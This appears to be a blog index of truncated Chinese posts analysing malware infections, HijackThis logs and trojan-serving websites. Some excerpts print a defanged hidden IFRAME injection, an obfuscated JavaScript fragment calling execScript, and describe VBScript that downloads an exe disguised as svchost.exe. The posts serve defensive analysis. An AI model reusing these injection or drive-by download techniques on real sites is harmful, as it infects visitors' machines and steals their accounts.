其他

endurer 原創2006-11-07 第1版有位網友的電腦中的瀏覽器被www.ting789.com劫持，並發來了HijackThis掃描的log。在log中發現如下可疑項目：/---------F3 - REG:win.ini: load=C:/windows/mobsync.exeO4 - 啟動項HKLM//Run: [mobsync] C:/windows/mobsync.exeO4 - Startup: 0A5021.exeO4 - Global Startup:

開機自動彈出離線工作對話方塊？原來是 Virus.Win32.AutoRun.bv 作怪endurer 原創2007-07-18

遭遇Trojan-PSW.Win32.OnLineGames,Trojan.PSW.Win32.Agent,Virus.Win32.AutoRun.er等endurer 原創2007-07-18 第2版  補充 Kaspersky  的回複2007-07-17 第1版有網友的電腦中的卡巴斯基最近經常報告發現病毒，如：/---感染: 木馬程式 Trojan-PSW.Win32.OnLineGames.dz C:/WINDOWS/system32/system63qso.dll 70.2 KB感染:

作者： Phillip Perkins2005-10-20 11:15

【Al Berg】【techtarget】http://searchsecurity.techtarget.com.cn/tips/30/2051030.shtml　　你在這篇技術指南講座中將學到:rootkit很難檢測，並且能夠讓駭客完全控制你的系統。搞清楚這些駭客工具是如何使用的，並且知道如何找出隱藏在你的系統中的rootkit。　　假設你是一個駭客。你剛好發現一個系統不是你的“leet

endurer 原創2007-01-29 第1版QQ收到如下資訊：/-------hxxp://www.a**hw**l**q*t.com/**1*23**.html 這裡有我的照片大家來看下順便給個評價謝謝了-------/開啟該網頁，沒有內容，但網頁中的VBScript代碼會利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 123.exe，儲存為 %temp%/svchost.exe，然後調用自訂函數tcsafe1exe(m5,X9

瑞星監控紅傘，啟動程式時提示找不到COMRes.dll endurer 原創2008-02-11 第1版 一位網友的電腦，最近出現問題：瑞星即時監控表徵圖變紅傘；啟動瑞星程式時提示找不到COMRes.dll，請偶幫忙處理。 下載HijackThis掃描 log 並分析，發現如下可疑項： Logfile of Trend Micro HijackThis v2.0.2Scan saved at 17:51:06, on 2009-2-6Platform: Windows XP SP2

一個掛馬Trojan-Downloader.JS.Multi.ax的網站endurer 原創2008-03-24 第1版開啟該網站，Kaspersky報告已檢測到: 木馬程式 Trojan-Downloader.JS.Multi.ax URL: hxxp://ad**.sh**i*t**ip.com/file/ad.js下載 HttpRead 來進行分析。首先檢查該網站代碼，發現：/---＜script src="../../../ads/iw_t.js"＞＜/script＞---/1、ads/

endurer 原創2007-01-08 第1版網頁的內容為JavaScript指令碼，分為三個部分：第1部分 是注釋：/---------/*GW]22Y!9YZbYvwYvA]+Tuv*Y{y]{ uw]{y]y!]F u*uGf]F*YG]vlY Z]vAY*uGR]{cYTG]Tbu{*uG+Y+Z]+Tu&9]yTu +uvR]GW]F*]F!Y&z]+ou su{GuGGu{{]y2uv]1uvf]Ff]y2Yy]*/execScript/* y]+2YXR]*fu*

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; FileName: msgbox2.asm; Function: Demo how to ho

Disable socket pooling in Windows 2000 Server在win 2000 Server中禁用通訊端池by  Jim Boyce  作者： Jim Boyce 翻譯：purpleendurerKeywords:  Windows 2000 | Internet | Servers | Web servers關鍵字：Windows 2000 | Internet | 伺服器 | Web伺服器http://techrepublic.com.com/5100-1087

endurer　原創2006-09-06　第2版2006-09-02　第1版網站 hxxp://www.94l***m.com/ 首頁會根據cookie的值開啟網頁：/------------hxxp://www.dudu**w.com/web/dudu*****13.htm------------/或/------------  hxxp://www.dud**uw.com/web/dudu*****12.htm------------/dudu*****13.htm 和 dudu*****1

endurer 原創2006-12-29 第1版一位網友的電腦出現問題：開啟IE時出錯關閉，讓偶幫忙檢修。通過QQ遠程協助進行。雙擊案頭上的IE表徵圖，彈出5460.dll引起錯誤的資訊框。用 pe_xscan 掃描 log，發現如下可疑項：/===========pe_xscan by Purple Endurer2006-12-29 12:35:22Windows XP Service Pack 2(5.1.2600)管理使用者組C:/WINDOWS/Explorer.EXE*1676   

　　從6.0 SP2開始，IE 不再支援view-source：協議，雖然 FireFox支援該協議，但為此而安裝 FireFox又實在是小題大作……　　於是就有HttpRead~1：http://purpleendurer.ys168.com2：http://download.csdn.net/source/392954HttpRead 0.0.0001 beta3 主要改進：1、支援一次讀取並顯示多個網頁源碼2、支援一次下載多個網路檔案檔案說明符 :

endurer  原創2006-09-01 

endurer 原創2007-01-30 第1版該網站首頁被加入代碼：/-------＜IFRAME src="hxxp://***.v**1*8***0.net/qq/" frameBorder=0 width=0 height=0＞＜/IFRAME＞-------/開啟該URL，沒有顯示內容，但網頁中的VBScript代碼會利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 qq.exe，儲存為 %temp%/svchost.exe

清除盜遊戲帳號的密西木馬變種(Trojan.PSW.Misc.r）等endurer　原創2006-04-29　第1版有位網友反應說，他的電腦運行MYIE2時經常出錯關閉。讓他用HijackThis（您可以到http://endurer.ys168.com下載）掃描log，發現如下可疑項目：  F2 - REG:system.ini: Shell=Explorer.exe 1O2 - BHO: wmpdrm - {0E674588-66B7-4E19-9D0E-2053B800F69F} - C:

一個隨身碟居然帶了三個病毒檔案Ghost.pif，cmdwin.exe，servet.exeendurer 原創2007-07-20 第1版下午，一位同事拿隨身碟過來用。用WinRAR查看，居然有三個病毒檔案。檔案說明符 : I:/Ghost.pif屬性 : ASH-擷取檔案版本資訊大小失敗!建立時間 : 2007-7-12 9:3:34修改時間 : 2007-7-18 16:48:14訪問時間 : 2007-7-20 0:0:0大小 : 23087 位元組 22.559 KBMD5 :

endurer 原創2007-06-25 第1版今天上午，一位同事說他們科室的兩台電腦開機時金山毒霸、瑞星程式出錯，運行很慢，讓偶協助檢查。用 pe_xscan 掃描 log 並分析，發現如下可疑項：/===pe_xscan 07-06-04 by Purple Endurer2007-6-25 10:17:31Windows XP Service Pack 2(5.1.2600)管理使用者組[System Process] * 0    C:/DOCUME~1/2298160/LOCALS~1

endurer　原創2006-08-16　第1版一位網友的電腦，查殺病毒後，雙擊案頭上的IE表徵圖卻彈出對話方塊，提示找不到檔案iexplore.com。估計是中了Trojan.PSW.Lmir、Trojan.PSW.Misc之類的網遊盜號木馬，註冊表的有關索引值被修改了。通過QQ遠程協助。開啟登錄編輯程式，搜尋：iexplore.com將找到的項目的值中的 iexplore.com 改為